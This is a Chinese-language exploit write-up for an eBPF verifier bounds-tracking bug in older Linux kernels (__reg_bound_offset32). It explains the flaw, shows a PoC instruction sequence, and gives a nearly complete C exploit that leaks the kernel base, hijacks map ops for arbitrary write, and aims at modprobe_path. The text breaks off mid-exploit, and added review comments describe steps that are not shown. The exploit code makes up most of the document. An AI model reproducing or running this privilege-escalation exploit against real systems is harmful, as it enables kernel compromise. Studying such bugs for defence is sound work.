影响版本

Linux kernel >= v5.4.7

于 v5.6.1、v5.5.14、v5.4.29 修复

基础知识:

ebpf验证器会对每个寄存器保存其当前状态,用bpf_reg_state来描述

这里引用了@becase 师傅的注释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
// ------------------------------------------------
/* Per-register state kept by the verifier: the register's type plus what is
 * known about the value it holds (var_off and the signed/unsigned bounds).
 */
struct bpf_reg_state {
enum bpf_reg_type type;
union {
/* valid when type == PTR_TO_PACKET */
u16 range;

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;

u32 btf_id; /* for PTR_TO_BTF_ID */

/* Max size from any of the above. */
unsigned long raw;
};
s32 off;
u32 id;
u32 ref_obj_id;
/* For scalar types (SCALAR_VALUE), this represents our knowledge of
* the actual value.
* For pointer types, this represents the variable part of the offset
* from the pointed-to object, and is shared with all bpf_reg_states
* with the same id as us.
*/
struct tnum var_off; // bit-level knowledge; see struct tnum for the value/mask encoding
/* Used to determine if any memory access using this register will
* result in a bad access.
* These refer to the same value as var_off, not necessarily the actual
* contents of the register.
*/
s64 smin_value; // minimum possible value when interpreted as signed
s64 smax_value; // maximum possible value when interpreted as signed
u64 umin_value; // minimum possible value when interpreted as unsigned
u64 umax_value; // maximum possible value when interpreted as unsigned
struct bpf_reg_state *parent;
u32 frameno;
s32 subreg_def;
enum bpf_reg_liveness live;
/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
bool precise;
};

// ------------------------------------------------
/* tnum: tracked (or tristate) numbers
*
* A tnum tracks knowledge about the bits of a value. Each bit can be either
* known (0 or 1), or unknown (x). Arithmetic operations on tnums will
* propagate the unknown bits such that the tnum result represents all the
* possible results for possible values of the operands.
*/
struct tnum {
u64 value; // value: a bit set to 1 here means that bit of the tracked number is known to be 1
u64 mask; // mask: a bit set to 1 here means that bit is unknown
};

验证器无法得知用户的输入(毕竟我们都还没输入),但是可以通过条件跳转等指令对寄存器大小进行判断,这一前提是所有先前的路径都必须有效(否则程序将无法加载),因此当前路径也必须有效。

比如说,如果已经执行过 BPF_JMP_REG(BPF_JLE,BPF_REG_6,BPF_REG_8,1),而reg8的值确定是0x100000001,且当前reg6的umax比这个值大的话,就会在跳转成立的分支上把umax更新为0x100000001:因为只有条件成立才会跳转到这里,所以reg6的最大值一定小于等于0x100000001

当mask为0时,所有位都已知,此时寄存器的值是一个常量(见下文的 tnum_is_const)。

漏洞分析

在我们使用jmp相关命令的时候,会进入 check_cond_jmp_op 函数

在该函数中有这样一段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/* detect if we are comparing against a constant value so we can adjust
* our min/max values for our dst register.
* this is only legit if both are scalars (or pointers to the same
* object, I suppose, but we don't support that right now), because
* otherwise the different base pointers mean the offsets aren't
* comparable.
*/
if (BPF_SRC(insn->code) == BPF_X) {
struct bpf_reg_state *src_reg = &regs[insn->src_reg];
struct bpf_reg_state lo_reg0 = *dst_reg;
struct bpf_reg_state lo_reg1 = *src_reg;
struct bpf_reg_state *src_lo, *dst_lo;

dst_lo = &lo_reg0;
src_lo = &lo_reg1;
coerce_reg_to_size(dst_lo, 4);
coerce_reg_to_size(src_lo, 4);

if (dst_reg->type == SCALAR_VALUE &&
src_reg->type == SCALAR_VALUE) {
if (tnum_is_const(src_reg->var_off) ||
(is_jmp32 && tnum_is_const(src_lo->var_off)))
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg,
is_jmp32
? src_lo->var_off.value
: src_reg->var_off.value,
opcode, is_jmp32);
else if (tnum_is_const(dst_reg->var_off) ||
(is_jmp32 && tnum_is_const(dst_lo->var_off)))
reg_set_min_max_inv(&other_branch_regs[insn->src_reg],
src_reg,
is_jmp32
? dst_lo->var_off.value
: dst_reg->var_off.value,
opcode, is_jmp32);
else if (!is_jmp32 &&
(opcode == BPF_JEQ || opcode == BPF_JNE))
/* Comparing for equality, we can combine knowledge */
reg_combine_min_max(&other_branch_regs[insn->src_reg],
&other_branch_regs[insn->dst_reg],
src_reg, dst_reg, opcode);
}

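当比较的两个操作数都是标量(SCALAR_VALUE)时,验证器会判断哪一侧是常量(jmp32时只看低32位):如果src寄存器是常量,就调用 reg_set_min_max 更新dst寄存器的范围;否则如果dst寄存器是常量,就调用 reg_set_min_max_inv 更新src寄存器的范围。下面以 reg_set_min_max_inv 为例。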

1
2
3
4
/* Returns true when no bit of @a is unknown (mask == 0), i.e. the tnum
 * describes a single constant value.
 */
static inline bool tnum_is_const(struct tnum a)
{
return !a.mask;
}

mask 全是0 即为常量

而在 reg_set_min_max_inv 函数内,如果是jmp32指令会进入 __reg_bound_offset32 来设置寄存器32位的边界值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/* Abridged quote: only the tail of the function is shown here, so @val and
 * @opcode are not used in the lines below.
 * For a 32-bit jump, var_off of both branch states is recomputed by
 * __reg_bound_offset32(); afterwards __update_reg_bounds() is run on both.
 */
static void reg_set_min_max_inv(struct bpf_reg_state *true_reg,
struct bpf_reg_state *false_reg, u64 val,
u8 opcode, bool is_jmp32)
{
if (is_jmp32) {
__reg_bound_offset32(false_reg); // state for the branch where the jump condition does not hold
__reg_bound_offset32(true_reg); // state for the branch where the jump condition holds
}
/* Intersecting with the old var_off might have improved our bounds
* slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__update_reg_bounds(false_reg);
__update_reg_bounds(true_reg);
}

__reg_bound_offset32 函数如下

计算range,也就是将两个值整合起来生成一个新的tnum var_off

1
2
3
4
5
6
7
8
9
10
/* Recomputes reg->var_off for a 32-bit comparison: the low 32 bits are
 * intersected with a tnum built from the truncated unsigned bounds, and the
 * high 32 bits of the old var_off are OR-ed back in.
 *
 * NOTE: umin_value and umax_value are 64-bit bounds. Masking each of them
 * with 0xffffFFFF simply drops their upper halves, so when the two bounds
 * differ above bit 31 (e.g. umin = 1, umax = 0x100000001) the pair passed to
 * tnum_range() no longer brackets the possible low-32-bit values.
 */
static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
u64 mask = 0xffffFFFF;
struct tnum range = tnum_range(reg->umin_value & mask,
reg->umax_value & mask);
struct tnum lo32 = tnum_cast(reg->var_off, 4); // keep the low 32 bits
struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);// keep the high 32 bits

reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}

这里我们假设 umax 为 0x100000001, umin 为1,

与mask进行&运算之后,两者的结果就都是1了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* Builds a tnum covering [min, max]: the bits above the highest bit in which
 * min and max differ are taken from min as known, and every bit from that
 * position down is marked unknown.
 */
struct tnum tnum_range(u64 min, u64 max)
{
u64 chi = min ^ max, delta;
u8 bits = fls64(chi);
// fls64: find last set bit in a 64-bit word, i.e. the 1-based position of
// the highest bit that is set; e.g. fls64(4) = 3 because 4 = 0b100

/* special case, needed because 1ULL << 64 is undefined */
if (bits > 63)
return tnum_unknown;
/* e.g. if chi = 4, bits = 3, delta = (1<<3) - 1 = 7.
* if chi = 0, bits = 0, delta = (1<<0) - 1 = 0, so we return
* constant min (since min == max).
*/
delta = (1ULL << bits) - 1;
return TNUM(min & ~delta, delta);
}

此时delta=0 , min=1 也就是说 mask=0,value=1 是一个恒为1的值,最后通过 tnum_or 合并(简单的或运算),得到确定的位和确定的值

而如果我们是用户输入的寄存器值的话,低32位是可控的

1
2
3
4
5
6
7
8
/* Combines the knowledge of two tnums that describe the same value. */
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
u64 v, mu;

v = a.value | b.value;
mu = a.mask & b.mask; // a bit stays unknown only if it is unknown in both inputs; a bit known in either one is known in the result
return TNUM(v & ~mu, mu);
}

我们计算后得到的tnum 会是一个恒为1的值(而非实际值)

poc

要设置umin_val和umax_val,我们可以使用验证程序的跳转分支逻辑:

BPF_JMP_IMM(BPF_JGE, BPF_REG_2, 1, 1)

BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

条件跳转将会产生两个分支。在采用的分支中,验证程序知道BPF_REG_2 >= 1,而另一分支将会以退出指令结束而被丢弃。因此,对于所有其他指令,寄存器2的umin_val将为1。

类似地,可以使用另一个条件跳转,将umax_val设置为2^32 + 1。但是,在这里我们需要与寄存器进行比较,因为仅支持32位立即数。之后,我们根据需要设置了umin_val和umax_val。

现在,可以使用任何有条件的32位跳转来触发该漏洞:

BPF_JMP32_IMM(BPF_JNE, BPF_REG_2, 5, 1),

BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0),

验证程序现在认为寄存器2的最后32位是二进制00…01,而实际上它们是二进制00…10。在另外两条指令之后:

BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 2),

BPF_ALU64_IMM(BPF_RSH, BPF_REG_2, 1),

验证程序现在假设寄存器2必须为0,因为如果寄存器2的倒数第二位为0,则AND指令必然会导致结果为0,但实际上它是(2&2)>>1 = 1。这是一个非常有用的原语:我们现在可以将寄存器2与任何数字相乘,从而构造出一个验证程序认为是0、实际上却是任意值的寄存器。

注意:

一开始我是直接通过mov来给寄存器赋值2的,结果行不通:

我们无法直接通过mov将值2加载到寄存器中,因为验证程序随后将知道umin_val=umax_val=2。但是,有一个简单的解决方法,如果我们从映射加载寄存器(我们可以使用我们的输入映射inmap),验证程序将不会得到关于其值的信息,因为我们可以在运行时更改映射值。

这里做个简单的调试,断点打在__reg_bound_offset32

image-20221120023746198

我们直接观察函数执行前后reg的变化。

使用映射加载的情况:

false前

image-20221120024415793

false后

image-20221120024451456

true前

image-20221120024601855

true后

image-20221120024620565

可以看到 value=0x1,mask只有第9个十六进制位(即bit 32,0x100000000)是1,也就是说低32位全部被当成已知,所以验证器会认为该寄存器的低32位恒为1

如果是使用mov reg 2 的话,r6将会是确定的值,就不会再进入reg_set_min_max_inv 函数内了

image-20221120025420898

exp

得到一个验证器为0的值,后面就是各种任意读写了,可以参考https://stdnoerr.github.io/writeup/2022/08/21/eBPF-exploitation-(ft.-D-3CTF-d3bpf).html 的做法,我第一次学习ebpf就是这个做法 ,(印象深刻…

顺便学一下别的做法

当map type为BPF_MAP_TYPE_QUEUE或者BPF_MAP_TYPE_STACK时,map_update_elem在内核中会转而调用map->ops->map_push_elem

1
2
3
4
5
6
7
8
 static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,  
void *value, __u64 flags)
{
//...
} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
¦ map->map_type == BPF_MAP_TYPE_STACK) {
err = map->ops->map_push_elem(map, value, flags);
//..

我们将map_push_elem劫持为map_get_next_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* Writes the index that follows *key into *next_key.
 *
 * @key:      pointer to the current u32 index; NULL is treated as U32_MAX
 * @next_key: destination, written as a u32
 *
 * Returns 0 after storing the next index, or -ENOENT (without writing) when
 * the current index is the last entry.
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;

/* out-of-range (or missing) key: restart from index 0 */
if (index >= array->map.max_entries) {
*next = 0;
return 0;
}

/* already at the last entry: nothing follows */
if (index == array->map.max_entries - 1)
return -ENOENT;

*next = index + 1;
return 0;
}

key 即我们通过 bpf_attr 传入的 value(attr.value),next_key 即 attr.flags

next=next_key=flags

index=*(key)=value[0]

*next=*(flags)=index+1=value[0]+1

即 *(flags)=value[0]+1

这样我们就实现了任意写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
(remote) gef➤  p *(struct bpf_map_ops*)0xffffffff8206cb40
$1 = {
map_alloc_check = 0xffffffff811fd5e0 <array_map_alloc_check>,
map_alloc = 0xffffffff811fe5a0 <array_map_alloc>,
map_release = 0x0 <fixed_percpu_data>,
map_free = 0xffffffff811fdd30 <array_map_free>,
map_get_next_key = 0xffffffff811fd6d0 <array_map_get_next_key>,
map_release_uref = 0x0 <fixed_percpu_data>,
map_lookup_elem_sys_only = 0x0 <fixed_percpu_data>,
map_lookup_batch = 0xffffffff811e5ae0 <generic_map_lookup_batch>,
map_lookup_and_delete_batch = 0x0 <fixed_percpu_data>,
map_update_batch = 0xffffffff811e58b0 <generic_map_update_batch>,
map_delete_batch = 0x0 <fixed_percpu_data>,
map_lookup_elem = 0xffffffff811fd790 <array_map_lookup_elem>,
map_update_elem = 0xffffffff811fdbf0 <array_map_update_elem>,
map_delete_elem = 0xffffffff811fd710 <array_map_delete_elem>,
map_push_elem = 0x0 <fixed_percpu_data>,
map_pop_elem = 0x0 <fixed_percpu_data>,
map_peek_elem = 0x0 <fixed_percpu_data>,
map_fd_get_ptr = 0x0 <fixed_percpu_data>,
map_fd_put_ptr = 0x0 <fixed_percpu_data>,
map_gen_lookup = 0xffffffff811fda60 <array_map_gen_lookup>,
map_fd_sys_lookup_elem = 0x0 <fixed_percpu_data>,
map_seq_show_elem = 0xffffffff811fd870 <array_map_seq_show_elem>,
map_check_btf = 0xffffffff811fe3b0 <array_map_check_btf>,
map_poke_track = 0x0 <fixed_percpu_data>,
map_poke_untrack = 0x0 <fixed_percpu_data>,
map_poke_run = 0x0 <fixed_percpu_data>,
map_direct_value_addr = 0xffffffff811fd660 <array_map_direct_value_addr>,
map_direct_value_meta = 0xffffffff811fd690 <array_map_direct_value_meta>,
map_mmap = 0xffffffff811fd830 <array_map_mmap>
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
#include<stdio.h>
#include<stdint.h>
#include<stdlib.h>
#include<string.h>
#include<syscall.h>
#include<unistd.h>
#include<sys/socket.h>
#include<linux/bpf.h>
#include "bpf_insn.h"
#include <stdlib.h>


/* Socket pair used to run the loaded program: attach_socket() attaches the
 * program to socks[0] and run_bpf_prog() writes to socks[1].
 * Only socks[0] starts at -1 (the "not created yet" marker checked by
 * attach_socket()); socks[1] is implicitly 0 until socketpair() fills it.
 */
int socks[2] = {-1};
/* Map file descriptors, assigned in main() from bpf_map_create(). */
int control_mapfd,exp_mapfd;

/*
 * Thin wrapper around the raw bpf(2) system call.
 *
 * cmd:  BPF_* command number.
 * attr: command arguments; the full size of union bpf_attr is passed.
 *
 * Returns whatever syscall() returns, narrowed to int.
 */
int bpf(int cmd,union bpf_attr *attr){
    size_t attr_len = sizeof(*attr);
    long rc = syscall(__NR_bpf, cmd, attr, attr_len);

    return (int)rc;
}

/*
 * Issue BPF_PROG_LOAD with the given attributes.
 * Returns the result of bpf() unchanged.
 */
int bpf_prog_load(union bpf_attr *attr){
    int fd = bpf(BPF_PROG_LOAD, attr);

    return fd;
}

/*
 * Allocate and fill a bpf_attr describing a BPF_PROG_TYPE_SOCKET_FILTER
 * program load.
 *
 * insns:    instruction array; only its address is stored, so it must stay
 *           valid until the attr has been handed to bpf().
 * insn_cnt: number of entries in insns.
 *
 * Returns a heap-allocated attr that the caller releases with free().
 * The attr is zero-filled before the fields are set, so every field not
 * assigned here is 0 instead of leftover heap contents. Exits the process
 * if the allocation fails.
 */
union bpf_attr* creat_bpf_prog(struct bpf_insn *insns,unsigned int insn_cnt){
    union bpf_attr *attr = calloc(1, sizeof(*attr));

    if (attr == NULL) {
        perror("calloc");
        exit(1);
    }

    attr->prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr->insn_cnt = insn_cnt;
    /* pointers are passed to the kernel as 64-bit integers */
    attr->insns = (uint64_t)(uintptr_t)insns;
    attr->license = (uint64_t)(uintptr_t)"";
    return attr;
}
/*
 * Attach a loaded BPF program to socks[0] with SO_ATTACH_BPF.
 * The socket pair is created on the first call, while socks[0] is still -1.
 *
 * prog_fd: file descriptor of the loaded program.
 *
 * Returns 0 on success; exits the process if socketpair() or setsockopt()
 * fails.
 */
int attach_socket(int prog_fd){
    if (socks[0] == -1 && socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) < 0) {
        perror("socketpair");
        exit(1);
    }

    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF,
                   &prog_fd, sizeof(prog_fd)) < 0) {
        perror("setsockopt");
        exit(1);
    }

    /* previously control fell off the end of this non-void function */
    return 0;
}

/*
 * Load a program with verifier logging enabled (log_level 2), print the
 * log, and attach the program to the socket pair.
 *
 * insns:   instruction array to load.
 * insncnt: number of entries in insns.
 *
 * Exits the process if the load fails (after reporting the error and
 * printing whatever log was produced).
 */
void setup_bpf_prog(struct bpf_insn* insns,unsigned int insncnt){
    /* zero-filled so strlen()/puts() are well defined even when the kernel
     * writes nothing into the buffer */
    char log_buffer[0x4000] = {0};

    union bpf_attr *prog = creat_bpf_prog(insns, insncnt);

    prog->log_level = 2;
    prog->log_buf = (uint64_t)(uintptr_t)log_buffer;
    prog->log_size = sizeof(log_buffer);
    /* the source string is shorter than the field, so strncpy NUL-pads it */
    strncpy(prog->prog_name, "stdnoerr", sizeof(prog->prog_name));

    int prog_fd = bpf_prog_load(prog);

    /* report the failure right away, before stdio calls can change errno */
    if (prog_fd < 0)
        perror("prog_load");

    printf("%zu\n", strlen(log_buffer));
    puts(log_buffer);

    /* the attr is only needed for the load itself */
    free(prog);

    if (prog_fd < 0)
        exit(1);

    attach_socket(prog_fd);
}

void run_bpf_prog(struct bpf_insn *insns,uint insncnt){
int val=0;

setup_bpf_prog(insns,insncnt);
write(socks[1],&val,sizeof(val));
}

/*
 * Create a BPF_MAP_TYPE_ARRAY map.
 *
 * key_size:    size of a key in bytes.
 * value_size:  size of a value in bytes.
 * max_entries: number of entries.
 *
 * Returns the result of bpf(BPF_MAP_CREATE, ...).
 */
int bpf_map_create(uint32_t key_size,uint32_t value_size,uint32_t max_entries){
    union bpf_attr attr;

    /* Clear the whole union explicitly: a partial initializer is not
     * guaranteed to zero bytes outside the member it initializes. */
    memset(&attr, 0, sizeof(attr));
    attr.map_type = BPF_MAP_TYPE_ARRAY;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return bpf(BPF_MAP_CREATE, &attr);
}

/*
 * Issue BPF_MAP_UPDATE_ELEM.
 *
 * map_fd: map file descriptor.
 * key:    key, passed by value; the address of this local copy is handed
 *         to the kernel.
 * value:  pointer to the value buffer.
 * flags:  stored in attr.flags as-is.
 *
 * Returns the result of bpf(BPF_MAP_UPDATE_ELEM, ...).
 */
int bpf_map_update_elem(int map_fd, uint64_t key, uint64_t* value, uint64_t flags){
    union bpf_attr attr;

    /* Clear the whole union explicitly: a partial initializer is not
     * guaranteed to zero bytes outside the member it initializes. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)(uintptr_t)&key;
    attr.value = (uint64_t)(uintptr_t)value;
    attr.flags = flags;

    return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

/*
 * Issue BPF_MAP_LOOKUP_ELEM and let the kernel copy the value into buf.
 *
 * map_fd: map file descriptor.
 * key:    key, passed by value; the address of this local copy is handed
 *         to the kernel.
 * buf:    destination buffer; the caller must make it large enough for one
 *         map value.
 *
 * Nothing is returned; a failed lookup is reported on stderr and buf is
 * left as it was.
 */
void bpf_map_lookup_elem(int map_fd, uint32_t key, void* buf){
    union bpf_attr attr;

    /* Clear the whole union explicitly: a partial initializer is not
     * guaranteed to zero bytes outside the member it initializes. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)(uintptr_t)&key;
    attr.value = (uint64_t)(uintptr_t)buf;

    if (bpf(BPF_MAP_LOOKUP_ELEM, &attr) < 0)
        perror("map_lookup_elem");
}



/*
 * Program entry point. In order, it:
 *   - creates the two array maps and fills them from heap buffers,
 *   - loads/runs test_prog once and dumps the first map values,
 *   - rewrites both maps and loads/runs test_prog a second time,
 *   - issues three more map updates and runs a series of shell commands.
 * The numeric offsets used below are hard-coded constants.
 *
 * NOTE(review): several generic C issues are flagged inline; the code itself
 * is left unchanged.
 */
int main(){


control_mapfd=bpf_map_create(4,0x100,1);
exp_mapfd=bpf_map_create(4,0x2000,1);
if(control_mapfd < 0 || exp_mapfd < 0 ){
perror("create map");
return 1;
}

// NOTE(review): neither malloc() result is checked before use
char *control_buf=malloc(0x100);
char *exp_buf=malloc(0x3000);

uint64_t* control_buf64=(uint64_t*)control_buf;
uint64_t* exp_buf64=(uint64_t*)exp_buf;

memset(control_buf,'a',0x100);

for(int i=0;i<0x2000/8;i++){
exp_buf64[i]=i+1;
}

control_buf64[0]=0x2;
control_buf64[1]=0x0;
// NOTE(review): the return values of these updates are ignored
bpf_map_update_elem(control_mapfd,0,control_buf64,BPF_ANY);
bpf_map_update_elem(exp_mapfd,0,exp_buf64,BPF_ANY);

struct bpf_insn test_prog[]={
BPF_MOV64_IMM(BPF_REG_0,0), // r0=0
BPF_LD_MAP_FD(BPF_REG_1,control_mapfd),// r1=ctrlfd
BPF_STX_MEM(BPF_W,BPF_REG_10,BPF_REG_0,-4),// *(r10-4)=r0=0
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),// r6=r1
BPF_LD_MAP_FD(BPF_REG_1, control_mapfd),//r1=&control_mapfd
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),//
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),//r2=r10-4 *r2=0
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), // r0=map_lookup(r1,r2)
// returns map_ptr + 0x110 (offset of .values in bpf_array)

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_MOV64_REG(BPF_REG_7,BPF_REG_0),//r7=r0
BPF_LDX_MEM(BPF_DW,6,7,0),//r6=*(r7)=ctrlmap[0]=2


BPF_ALU64_IMM(BPF_MOV,BPF_REG_0,0),
//to set umin 1
BPF_JMP_IMM(BPF_JGE,BPF_REG_6,1,1),
BPF_EXIT_INSN(),

BPF_MOV64_IMM(BPF_REG_8,0x1),
BPF_ALU64_IMM(BPF_LSH,BPF_REG_8,32),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_8,1),
//to set umax 0x100000001
BPF_JMP_REG(BPF_JLE,BPF_REG_6,BPF_REG_8,1),
BPF_EXIT_INSN(),

// JMP32 the bug
BPF_JMP32_IMM(BPF_JNE,BPF_REG_6,5,1),
BPF_EXIT_INSN(),

// real r6=2 , fake r6 = 1
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2),
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1),
// (r6&2)>>1 ===> r6=1 fake r6 = 0


// init done
// now r6=1 , r7=ctrmap_prt+0x110


BPF_ALU64_IMM(BPF_MUL,BPF_REG_6,0x110),

// outmap r6=0x110
BPF_MOV64_IMM(BPF_REG_0,0),
BPF_STX_MEM(BPF_W,BPF_REG_10,BPF_REG_0,-4),// *(r10-4)=r0=0
BPF_LD_MAP_FD(BPF_REG_1, exp_mapfd),//r1=&exp_mapfd
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),//
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),//r2=r10-4 *r2=0
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
//ret r0=expmap_ptr+0x110

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_MOV64_REG(BPF_REG_9,0),
//r9=expmap_ptr+0x110
BPF_ALU64_REG(BPF_SUB,BPF_REG_9,BPF_REG_6),
//r9=expmap_ptr fake r9 remain expmap_ptr+0x110

BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_9,0), // r8=*(r9)=expops_addr

BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_8,0x10),
// *(expmap_prt+0x110+0x10)=r9=ops_addr

BPF_MOV64_REG(BPF_REG_2,BPF_REG_8),//r2=r8

BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_9,0xc0),
// r8= *(r9+0xc0)=*(ops_addr+0xc0)=map_addr+0xc0
BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_8,0x18),
// *(r7+0x18)=*(map_prt+0x110+0x18)=*(ops_addr+0xc0)=map_addr



BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_9,0x40),
// *(r7+0x40)=*(map_ptr+0x110+0x40)=r9=ops_addr
BPF_ALU64_IMM(BPF_ADD,BPF_REG_8,0x50),
// r8+=0x50 r8=*(ops_addr+0xc0)+0x50= map_addr+0x110

BPF_LDX_MEM(BPF_DW,BPF_REG_2,BPF_REG_7,0x8),
// r2=*(r7+8)=update[1]
BPF_JMP_IMM(BPF_JNE,BPF_REG_2,1,4),//for first time leak jmp


// map_addr == ops_addr
// map_get_next_key = *(ops_addr+0x20)
// map_push= *(ops_addr+0x70)
// *(map_prt+0x110+0x10)=ops_addr
// 0x70-0x20=0x50

//
// so just let *(ops_addr)=expmap_ptr+0x110
BPF_STX_MEM(BPF_DW,BPF_REG_9,BPF_REG_8,0),
// *(r9)=*(ops_addr)=map_addr+0x110
// ops->push == map_get_next_key
// value => key ; flags => next_key
BPF_ST_MEM(BPF_W,BPF_REG_9,0x18,BPF_MAP_TYPE_STACK),
// *(r9+0x18)=*(map_type)=BPF_MAP_TYPE_STACK
BPF_ST_MEM(BPF_W,BPF_REG_9,0x24,-1),
// *(r9+0x24)=*(max_entry)=-1
BPF_ST_MEM(BPF_W,BPF_REG_9,0x2c,0x0),
// *(r9+0x2c)=*(spin_lock_off)=0


BPF_ALU64_IMM(BPF_MOV,BPF_REG_0,0),
BPF_EXIT_INSN(),
};



run_bpf_prog(test_prog,sizeof(test_prog)/sizeof(test_prog[0]));

memset(control_buf,0,0x100);
bpf_map_lookup_elem(control_mapfd,0,control_buf);
bpf_map_lookup_elem(exp_mapfd,0,exp_buf);

// NOTE(review): "%p" expects a void *, but a uint64_t is passed here and in
// the other dump/printf calls below; this is a format/argument type mismatch
for(int i=0;i<10;i++){
printf("[+] dump:%p\n",control_buf64[i]);
}
uint64_t kbase=control_buf64[2]-0x106cb40;
uint64_t modprobe_path=kbase+0x16616a0;
uint64_t map_addr=control_buf64[3]-0xc0+0x110;
uint64_t kaslr=kbase-0xffffffff81000000;
printf("[+] kbase:%p\n",kbase);
printf("[+] modp:%p\n",modprobe_path);
printf("[+] map_addr:%p\n",map_addr);

// overwrite




uint64_t fake_map_ops[]={
kaslr+0xffffffff811fd5e0,
kaslr+0xffffffff811fe5a0,
0x0,
kaslr+0xffffffff811fdd30,
kaslr+0xffffffff811fd6d0,
0x0,
0x0,
kaslr+0xffffffff811e5ae0,
0x0,
kaslr+0xffffffff811e58b0,
0x0,
kaslr+0xffffffff811fd790,
kaslr+0xffffffff811fdbf0,
kaslr+0xffffffff811fd710,
kaslr+0xffffffff811fd6d0,
0,0,0,0,0,
kaslr+0xffffffff811fda60,
0,
kaslr+0xffffffff811fd870,
kaslr+0xffffffff811fe3b0,
0,0,0,
kaslr+0xffffffff811fd660,
kaslr+0xffffffff811fd690,
kaslr+0xffffffff811fd830
};

memcpy(exp_buf,(void*)fake_map_ops,sizeof(fake_map_ops));



// NOTE(review): exp_buf / control_buf are char *, while the parameter is
// uint64_t * (incompatible pointer type); exp_buf64 / control_buf64 alias the
// same memory with the expected type
bpf_map_update_elem(exp_mapfd,0,exp_buf,0);

for(int i=0;i<10;i++){
printf("[+] test dump:%p\n",exp_buf64[i]);
}

control_buf64[0]=0x2;
control_buf64[1]=0x1;
bpf_map_update_elem(control_mapfd,0,control_buf,BPF_ANY);

sleep(2);

memset(exp_buf64,'a',0x20);


bpf_map_lookup_elem(exp_mapfd,0,exp_buf);
// NOTE(review): this prints the pointer exp_buf64 itself ten times; the
// earlier dump loops index the array (exp_buf64[i])
for(int i=0;i<10;i++){
printf("[+] test dump:%p\n",exp_buf64);
}

run_bpf_prog(test_prog,sizeof(test_prog)/sizeof(test_prog[0]));



exp_buf64[0]=0x706d742f -1;
